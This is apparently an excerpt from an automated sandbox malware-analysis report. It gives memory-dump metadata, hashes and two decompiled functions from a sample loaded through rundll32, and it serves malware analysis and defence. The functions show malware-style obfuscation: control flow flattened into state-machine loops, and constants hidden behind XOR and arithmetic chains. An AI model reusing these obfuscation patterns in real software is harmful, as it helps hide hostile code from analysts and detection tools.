                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E003545CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				unsigned int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t260;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				void* _t285;
                                                                                                                      				intOrPtr _t286;
                                                                                                                      				void* _t288;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				void* _t293;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				signed int _t313;
                                                                                                                      				signed int _t314;
                                                                                                                      				signed int _t315;
                                                                                                                      				void* _t317;
                                                                                                                      				void* _t318;
                                                                                                                      
                                                                                                                      				_t291 = _a8;
                                                                                                                      				_t312 = _a4;
                                                                                                                      				_push(_t291);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t260);
                                                                                                                      				_v16 = 0xeda856;
                                                                                                                      				_t310 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_t318 = _t317 + 0x10;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x9530b9;
                                                                                                                      				_t293 = 0x1386c75;
                                                                                                                      				_v108 = _v108 + 0xffff8498;
                                                                                                                      				_v108 = _v108 + 0xffff62a2;
                                                                                                                      				_v108 = _v108 ^ 0x009417f2;
                                                                                                                      				_v72 = 0x4d29da;
                                                                                                                      				_v72 = _v72 | 0x3a723bc7;
                                                                                                                      				_v72 = _v72 ^ 0x3a7f3bde;
                                                                                                                      				_v68 = 0xbb7b0e;
                                                                                                                      				_v68 = _v68 | 0x90968cd5;
                                                                                                                      				_v68 = _v68 ^ 0x90bfffdf;
                                                                                                                      				_v32 = 0x962435;
                                                                                                                      				_v32 = _v32 << 9;
                                                                                                                      				_v32 = _v32 ^ 0x2c486a00;
                                                                                                                      				_v124 = 0x38cf9b;
                                                                                                                      				_t313 = 0x3a;
                                                                                                                      				_v124 = _v124 * 0x5b;
                                                                                                                      				_v124 = _v124 / _t313;
                                                                                                                      				_v124 = _v124 << 3;
                                                                                                                      				_v124 = _v124 ^ 0x02c91350;
                                                                                                                      				_v104 = 0xa200dd;
                                                                                                                      				_v104 = _v104 ^ 0x0aab722c;
                                                                                                                      				_v104 = _v104 + 0xffff0d17;
                                                                                                                      				_v104 = _v104 ^ 0x0a088008;
                                                                                                                      				_v136 = 0xa03782;
                                                                                                                      				_v136 = _v136 >> 4;
                                                                                                                      				_v136 = _v136 >> 0xf;
                                                                                                                      				_v136 = _v136 + 0xffffdc54;
                                                                                                                      				_v136 = _v136 ^ 0xffffdc68;
                                                                                                                      				_v100 = 0xea2f66;
                                                                                                                      				_v100 = _v100 + 0xffffd1b3;
                                                                                                                      				_v100 = _v100 + 0xffff51f8;
                                                                                                                      				_v100 = _v100 ^ 0x00e840e3;
                                                                                                                      				_v132 = 0xadb516;
                                                                                                                      				_v132 = _v132 + 0xffff9028;
                                                                                                                      				_v132 = _v132 * 0x44;
                                                                                                                      				_v132 = _v132 + 0xffffe891;
                                                                                                                      				_v132 = _v132 ^ 0x2e08c107;
                                                                                                                      				_v140 = 0xeec816;
                                                                                                                      				_v140 = _v140 >> 7;
                                                                                                                      				_v140 = _v140 >> 0xf;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 ^ 0x000acf9f;
                                                                                                                      				_v116 = 0xb8b4c3;
                                                                                                                      				_v116 = _v116 + 0x5cf4;
                                                                                                                      				_v116 = _v116 + 0xffff9c7f;
                                                                                                                      				_v116 = _v116 ^ 0x00b90cd0;
                                                                                                                      				_v144 = 0x42ac99;
                                                                                                                      				_v144 = _v144 + 0xfffff6b6;
                                                                                                                      				_v144 = _v144 | 0xd26fea09;
                                                                                                                      				_v144 = _v144 + 0xcbeb;
                                                                                                                      				_v144 = _v144 ^ 0xd277b085;
                                                                                                                      				_v96 = 0x1bc5eb;
                                                                                                                      				_v96 = _v96 * 0x6c;
                                                                                                                      				_v96 = _v96 + 0x8f6c;
                                                                                                                      				_v96 = _v96 ^ 0x0bb05dde;
                                                                                                                      				_v48 = 0x1a2576;
                                                                                                                      				_v48 = _v48 * 0x64;
                                                                                                                      				_v48 = _v48 ^ 0x0a36ba39;
                                                                                                                      				_v88 = 0xc7f5d;
                                                                                                                      				_v88 = _v88 >> 4;
                                                                                                                      				_v88 = _v88 >> 0xf;
                                                                                                                      				_v88 = _v88 ^ 0x00037446;
                                                                                                                      				_v84 = 0x3f34b5;
                                                                                                                      				_t314 = 0x5e;
                                                                                                                      				_v84 = _v84 * 0x31;
                                                                                                                      				_v84 = _v84 >> 0xe;
                                                                                                                      				_v84 = _v84 ^ 0x000d159a;
                                                                                                                      				_v120 = 0x5d4df8;
                                                                                                                      				_v120 = _v120 + 0xffffa239;
                                                                                                                      				_v120 = _v120 << 4;
                                                                                                                      				_v120 = _v120 ^ 0x05c58312;
                                                                                                                      				_v60 = 0x26932d;
                                                                                                                      				_v60 = _v60 / _t314;
                                                                                                                      				_v60 = _v60 ^ 0x000131ea;
                                                                                                                      				_v28 = 0x785747;
                                                                                                                      				_v28 = _v28 ^ 0x77c5d7dc;
                                                                                                                      				_v28 = _v28 ^ 0x77b818bc;
                                                                                                                      				_v56 = 0xd134ba;
                                                                                                                      				_t315 = 0x67;
                                                                                                                      				_v56 = _v56 * 7;
                                                                                                                      				_v56 = _v56 ^ 0x05bb4239;
                                                                                                                      				_v40 = 0xd9afd1;
                                                                                                                      				_v40 = _v40 * 0x25;
                                                                                                                      				_v40 = _v40 ^ 0x1f79b6d7;
                                                                                                                      				_v128 = 0x3f4f78;
                                                                                                                      				_v128 = _v128 / _t315;
                                                                                                                      				_v128 = _v128 | 0x7b2b5a07;
                                                                                                                      				_v128 = _v128 + 0xfffffa98;
                                                                                                                      				_v128 = _v128 ^ 0x7b2edba2;
                                                                                                                      				_v80 = 0xe956c4;
                                                                                                                      				_v80 = _v80 << 5;
                                                                                                                      				_v80 = _v80 ^ 0x1d2c49e8;
                                                                                                                      				_v64 = 0x3f3e0b;
                                                                                                                      				_v64 = _v64 * 5;
                                                                                                                      				_v64 = _v64 ^ 0x01394f8d;
                                                                                                                      				_v112 = 0xfc7f0a;
                                                                                                                      				_v112 = _v112 + 0xffff18e0;
                                                                                                                      				_v112 = _v112 + 0xffffa855;
                                                                                                                      				_v112 = _v112 ^ 0x00f14c19;
                                                                                                                      				_v92 = 0x78d624;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 + 0xffffec5c;
                                                                                                                      				_v92 = _v92 ^ 0x1e335a68;
                                                                                                                      				_v36 = 0xd9641a;
                                                                                                                      				_v36 = _v36 + 0xffff84de;
                                                                                                                      				_v36 = _v36 ^ 0x00d9de20;
                                                                                                                      				_v44 = 0x6f829b;
                                                                                                                      				_v44 = _v44 ^ 0xdbcb61d0;
                                                                                                                      				_v44 = _v44 ^ 0xdba9195b;
                                                                                                                      				_v52 = 0xea26f7;
                                                                                                                      				_v52 = _v52 + 0xffff0808;
                                                                                                                      				_v52 = _v52 ^ 0x00eef997;
                                                                                                                      				_v76 = 0xef1604;
                                                                                                                      				_v76 = _v76 + 0xfcdc;
                                                                                                                      				_v76 = _v76 + 0xffff9946;
                                                                                                                      				_v76 = _v76 ^ 0x00e2e7da;
                                                                                                                      				while(_t293 != 0x1386c75) {
                                                                                                                      					if(_t293 == 0x185c552) {
                                                                                                                      						_push(_t293);
                                                                                                                      						_push(_t293);
                                                                                                                      						_t280 = E00353512(_v20);
                                                                                                                      						_v24 = _t280;
                                                                                                                      						if(_t280 != 0) {
                                                                                                                      							_t293 = 0x84b6bf9;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t293 == 0x1b7bba2) {
                                                                                                                      							E003468DE(_v36, _v44, _v52, _v76, _v24);
                                                                                                                      						} else {
                                                                                                                      							if(_t293 == 0x8150c28) {
                                                                                                                      								_t283 =  *0x365c9c; // 0x0
                                                                                                                      								_t285 = E0034AD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
                                                                                                                      								_t318 = _t318 + 0x40;
                                                                                                                      								if(_t285 == _v124) {
                                                                                                                      									_t293 = 0x185c552;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t293 != 0x84b6bf9) {
                                                                                                                      									L13:
                                                                                                                      									if(_t293 != 0x3792bf2) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t286 =  *0x365c9c; // 0x0
                                                                                                                      									_t222 =  &_v128; // 0xe840e3
                                                                                                                      									_t288 = E0034AD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
                                                                                                                      									_t318 = _t318 + 0x40;
                                                                                                                      									if(_t288 == _v136) {
                                                                                                                      										 *_t291 = _v24;
                                                                                                                      										_t310 = 1;
                                                                                                                      										 *((intOrPtr*)(_t291 + 4)) = _v20;
                                                                                                                      									} else {
                                                                                                                      										_t293 = 0x1b7bba2;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t310;
                                                                                                                      				}
                                                                                                                      				_t293 = 0x8150c28;
                                                                                                                      				goto L13;
                                                                                                                      			}

                                                                                                                      0x003547ab
                                                                                                                      0x003547af
                                                                                                                      0x003547b7
                                                                                                                      0x003547bf
                                                                                                                      0x003547cc
                                                                                                                      0x003547d2
                                                                                                                      0x003547da
                                                                                                                      0x003547e2
                                                                                                                      0x003547e7
                                                                                                                      0x003547ec
                                                                                                                      0x003547f4
                                                                                                                      0x00354803
                                                                                                                      0x00354806
                                                                                                                      0x0035480a
                                                                                                                      0x0035480f
                                                                                                                      0x00354817
                                                                                                                      0x0035481f
                                                                                                                      0x00354827
                                                                                                                      0x0035482c
                                                                                                                      0x00354834
                                                                                                                      0x00354844
                                                                                                                      0x00354848
                                                                                                                      0x00354850
                                                                                                                      0x0035485b
                                                                                                                      0x00354866
                                                                                                                      0x00354871
                                                                                                                      0x0035487e
                                                                                                                      0x0035487f
                                                                                                                      0x00354883
                                                                                                                      0x0035488b
                                                                                                                      0x00354898
                                                                                                                      0x0035489c
                                                                                                                      0x003548a4
                                                                                                                      0x003548b7
                                                                                                                      0x003548bb
                                                                                                                      0x003548c3
                                                                                                                      0x003548cb
                                                                                                                      0x003548d3
                                                                                                                      0x003548db
                                                                                                                      0x003548e8
                                                                                                                      0x003548f0
                                                                                                                      0x003548fd
                                                                                                                      0x00354901
                                                                                                                      0x00354909
                                                                                                                      0x00354911
                                                                                                                      0x00354919
                                                                                                                      0x00354921
                                                                                                                      0x00354929
                                                                                                                      0x00354931
                                                                                                                      0x00354936
                                                                                                                      0x0035493e
                                                                                                                      0x00354946
                                                                                                                      0x00354951
                                                                                                                      0x0035495c
                                                                                                                      0x00354967
                                                                                                                      0x0035496f
                                                                                                                      0x00354977
                                                                                                                      0x0035497f
                                                                                                                      0x00354987
                                                                                                                      0x0035498f
                                                                                                                      0x00354997
                                                                                                                      0x0035499f
                                                                                                                      0x003549a7
                                                                                                                      0x003549af
                                                                                                                      0x003549b7
                                                                                                                      0x003549c5
                                                                                                                      0x00354ad4
                                                                                                                      0x00354ad5
                                                                                                                      0x00354add
                                                                                                                      0x00354ae2
                                                                                                                      0x00354aed
                                                                                                                      0x00354aef
                                                                                                                      0x00000000
                                                                                                                      0x00354aef
                                                                                                                      0x003549cb
                                                                                                                      0x003549d1
                                                                                                                      0x00354b41
                                                                                                                      0x003549d7
                                                                                                                      0x003549dd
                                                                                                                      0x00354a72
                                                                                                                      0x00354aaf
                                                                                                                      0x00354ab4
                                                                                                                      0x00354abb
                                                                                                                      0x00354ac1
                                                                                                                      0x00000000
                                                                                                                      0x00354ac1
                                                                                                                      0x003549e3
                                                                                                                      0x003549e9
                                                                                                                      0x00354afe
                                                                                                                      0x00354b04
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00354b0a
                                                                                                                      0x003549ef
                                                                                                                      0x003549fb
                                                                                                                      0x00354a10
                                                                                                                      0x00354a48
                                                                                                                      0x00354a4d
                                                                                                                      0x00354a54
                                                                                                                      0x00354b15
                                                                                                                      0x00354b17
                                                                                                                      0x00354b1f
                                                                                                                      0x00354a5a
                                                                                                                      0x00354a5a
                                                                                                                      0x00000000
                                                                                                                      0x00354a5a
                                                                                                                      0x00354a54
                                                                                                                      0x003549e9
                                                                                                                      0x003549dd
                                                                                                                      0x003549d1
                                                                                                                      0x00354b55
                                                                                                                      0x00354b55
                                                                                                                      0x00354af9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: da99dae88e04b3d2f9995ec7ca26f0273188afa89b339b135914a4bcdb6348d1
                                                                                                                      • Instruction ID: ca2387531677ec0059875285fda3c37b385d26d98b92ce67491e947f1998fbdb
                                                                                                                      • Opcode Fuzzy Hash: da99dae88e04b3d2f9995ec7ca26f0273188afa89b339b135914a4bcdb6348d1
                                                                                                                      • Instruction Fuzzy Hash: 4CD10DB20083819FD769CF65C989A5BBBF1BBC4748F108A1DF6D986260D7B19948DF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0034E243() {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				char _v32;
                                                                                                                      				char _v36;
                                                                                                                      				char _v40;
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				intOrPtr _t246;
                                                                                                                      				signed int _t250;
                                                                                                                      				intOrPtr _t256;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr _t262;
                                                                                                                      				signed int _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				signed int _t269;
                                                                                                                      				intOrPtr _t277;
                                                                                                                      				void* _t300;
                                                                                                                      				char _t304;
                                                                                                                      				void* _t305;
                                                                                                                      				void* _t307;
                                                                                                                      
                                                                                                                      				_v20 = 0x755bf0;
                                                                                                                      				_v16 = 0xbb5ee2;
                                                                                                                      				_v12 = 0xb403bb;
                                                                                                                      				_t262 = 0;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x84f903;
                                                                                                                      				_v108 = _v108 << 0xe;
                                                                                                                      				_v108 = _v108 | 0x00052a35;
                                                                                                                      				_v108 = _v108 + 0x3d3f;
                                                                                                                      				_v108 = _v108 ^ 0x3e47d87c;
                                                                                                                      				_v88 = 0x71c3c4;
                                                                                                                      				_v88 = _v88 + 0xffffe131;
                                                                                                                      				_t264 = 0x3b;
                                                                                                                      				_v88 = _v88 / _t264;
                                                                                                                      				_v88 = _v88 ^ 0x40aa9d70;
                                                                                                                      				_t300 = 0xfb124ba;
                                                                                                                      				_v88 = _v88 ^ 0x40a0f61c;
                                                                                                                      				_v52 = 0x7362f6;
                                                                                                                      				_v52 = _v52 | 0xb899219a;
                                                                                                                      				_v52 = _v52 ^ 0xb8f51d59;
                                                                                                                      				_v56 = 0xfd4e8c;
                                                                                                                      				_t265 = 0x71;
                                                                                                                      				_v56 = _v56 * 0x54;
                                                                                                                      				_v56 = _v56 ^ 0x53104169;
                                                                                                                      				_v92 = 0xd5c279;
                                                                                                                      				_v92 = _v92 + 0x8479;
                                                                                                                      				_v92 = _v92 + 0xffffbe38;
                                                                                                                      				_v92 = _v92 / _t265;
                                                                                                                      				_v92 = _v92 ^ 0x0004c231;
                                                                                                                      				_v68 = 0x9eb1ac;
                                                                                                                      				_t266 = 0x4a;
                                                                                                                      				_v68 = _v68 * 0x7b;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0x87ec7921;
                                                                                                                      				_v104 = 0x24a1b7;
                                                                                                                      				_v104 = _v104 << 4;
                                                                                                                      				_v104 = _v104 | 0x0d0d6548;
                                                                                                                      				_t62 =  &_v104; // 0xd0d6548
                                                                                                                      				_v104 =  *_t62 / _t266;
                                                                                                                      				_v104 = _v104 ^ 0x003eb00a;
                                                                                                                      				_v96 = 0x109237;
                                                                                                                      				_v96 = _v96 ^ 0x088082ff;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0xdcc593d2;
                                                                                                                      				_v96 = _v96 ^ 0xd88ac121;
                                                                                                                      				_v100 = 0xaca53b;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_t267 = 0x53;
                                                                                                                      				_v100 = _v100 * 0x47;
                                                                                                                      				_v100 = _v100 + 0xffff22d9;
                                                                                                                      				_v100 = _v100 ^ 0x0009f7ae;
                                                                                                                      				_v60 = 0xde163e;
                                                                                                                      				_v60 = _v60 + 0xffffe594;
                                                                                                                      				_v60 = _v60 ^ 0x00de9d26;
                                                                                                                      				_v120 = 0x240793;
                                                                                                                      				_v120 = _v120 / _t267;
                                                                                                                      				_v120 = _v120 * 0x19;
                                                                                                                      				_v120 = _v120 + 0xd430;
                                                                                                                      				_v120 = _v120 ^ 0x0006e0c9;
                                                                                                                      				_v124 = 0xc58e86;
                                                                                                                      				_t268 = 0x65;
                                                                                                                      				_v124 = _v124 / _t268;
                                                                                                                      				_v124 = _v124 >> 0xb;
                                                                                                                      				_v124 = _v124 ^ 0x9d14b09a;
                                                                                                                      				_v124 = _v124 ^ 0x9d1ca329;
                                                                                                                      				_v64 = 0xc78ca0;
                                                                                                                      				_v64 = _v64 | 0xd15d632f;
                                                                                                                      				_v64 = _v64 ^ 0xd1d5a42f;
                                                                                                                      				_v128 = 0x79ba0a;
                                                                                                                      				_v128 = _v128 ^ 0x7ce03b8e;
                                                                                                                      				_v128 = _v128 + 0x4723;
                                                                                                                      				_v128 = _v128 >> 0xa;
                                                                                                                      				_v128 = _v128 ^ 0x00126e73;
                                                                                                                      				_v112 = 0x301104;
                                                                                                                      				_v112 = _v112 ^ 0x99cc29f1;
                                                                                                                      				_v112 = _v112 >> 0xb;
                                                                                                                      				_v112 = _v112 << 0xe;
                                                                                                                      				_v112 = _v112 ^ 0xcfe465e8;
                                                                                                                      				_v72 = 0xf18177;
                                                                                                                      				_v72 = _v72 + 0xffff968e;
                                                                                                                      				_v72 = _v72 + 0x6cf6;
                                                                                                                      				_v72 = _v72 ^ 0x00fdce33;
                                                                                                                      				_v76 = 0xd90ee1;
                                                                                                                      				_v76 = _v76 + 0xffffa364;
                                                                                                                      				_v76 = _v76 ^ 0x3c048803;
                                                                                                                      				_v76 = _v76 ^ 0x3cd13d13;
                                                                                                                      				_v116 = 0xc42f7d;
                                                                                                                      				_v116 = _v116 >> 2;
                                                                                                                      				_v116 = _v116 + 0x3407;
                                                                                                                      				_v116 = _v116 >> 7;
                                                                                                                      				_v116 = _v116 ^ 0x0009b6df;
                                                                                                                      				_v48 = 0xe39a19;
                                                                                                                      				_v48 = _v48 | 0x7412591d;
                                                                                                                      				_v48 = _v48 ^ 0x74ffcd98;
                                                                                                                      				_v80 = 0xc90483;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_t269 = 0x17;
                                                                                                                      				_v80 = _v80 / _t269;
                                                                                                                      				_v80 = _v80 * 0x7d;
                                                                                                                      				_v80 = _v80 ^ 0x0220ab71;
                                                                                                                      				_v84 = 0xc67ab0;
                                                                                                                      				_v84 = _v84 >> 0xa;
                                                                                                                      				_v84 = _v84 * 3;
                                                                                                                      				_v84 = _v84 | 0xfb397840;
                                                                                                                      				_v84 = _v84 ^ 0xfb3c3624;
                                                                                                                      				_t304 = _v44;
                                                                                                                      				_t299 = _v44;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t307 = _t300 - 0x73106c8;
                                                                                                                      						if(_t307 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t307 == 0) {
                                                                                                                      							_t250 = E0035026B(_v96,  &_v40,  &_v32, _v100, _v60);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0xc1fb10) {
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							if(_v44 > 2) {
                                                                                                                      								_t261 = E0035561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
                                                                                                                      								_v40 = _t261;
                                                                                                                      								if(_t261 != 0) {
                                                                                                                      									_t300 = 0x73106c8;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x37ef4f2) {
                                                                                                                      							_t304 = E0035E35A();
                                                                                                                      							_t300 = 0xc8dd531;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x44dd11e) {
                                                                                                                      							E003468DE(_v112, _v72, _v76, _v116, _v40);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 != 0x677d978) {
                                                                                                                      							goto L21;
                                                                                                                      						} else {
                                                                                                                      							_t256 =  *0x36520c; // 0x0
                                                                                                                      							E0034F4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
                                                                                                                      							_t277 =  *0x36520c; // 0x0
                                                                                                                      							_t305 = _t305 + 0x14;
                                                                                                                      							_t262 = 1;
                                                                                                                      							_t300 = 0x44dd11e;
                                                                                                                      							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xc8dd531) {
                                                                                                                      						_t246 = E0034BC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
                                                                                                                      						_t299 = _t246;
                                                                                                                      						_t305 = _t305 + 0x10;
                                                                                                                      						if(_t246 == 0) {
                                                                                                                      							_t300 = 0xa73b483;
                                                                                                                      							goto L21;
                                                                                                                      						}
                                                                                                                      						_t300 = 0xc1fb10;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xde7de8b) {
                                                                                                                      						E0034FFF2(_v48, _v80, _v84, _t299);
                                                                                                                      						L24:
                                                                                                                      						return _t262;
                                                                                                                      					}
                                                                                                                      					if(_t300 != 0xfb124ba) {
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      					_t300 = 0x37ef4f2;
                                                                                                                      					goto L1;
                                                                                                                      					L21:
                                                                                                                      				} while (_t300 != 0xa73b483);
                                                                                                                      				goto L24;
                                                                                                                      			}


















































                                                                                                                      0x0034e55a
                                                                                                                      0x0034e55e
                                                                                                                      0x0034e55e
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e568
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e56e
                                                                                                                      0x0034e680
                                                                                                                      0x0034e685
                                                                                                                      0x0034e68c
                                                                                                                      0x0034e694
                                                                                                                      0x00000000
                                                                                                                      0x0034e694
                                                                                                                      0x0034e57a
                                                                                                                      0x0034e633
                                                                                                                      0x0034e638
                                                                                                                      0x0034e64e
                                                                                                                      0x0034e653
                                                                                                                      0x0034e65b
                                                                                                                      0x0034e661
                                                                                                                      0x0034e661
                                                                                                                      0x0034e65b
                                                                                                                      0x00000000
                                                                                                                      0x0034e638
                                                                                                                      0x0034e586
                                                                                                                      0x0034e622
                                                                                                                      0x0034e624
                                                                                                                      0x00000000
                                                                                                                      0x0034e624
                                                                                                                      0x0034e592
                                                                                                                      0x0034e607
                                                                                                                      0x0034e60c
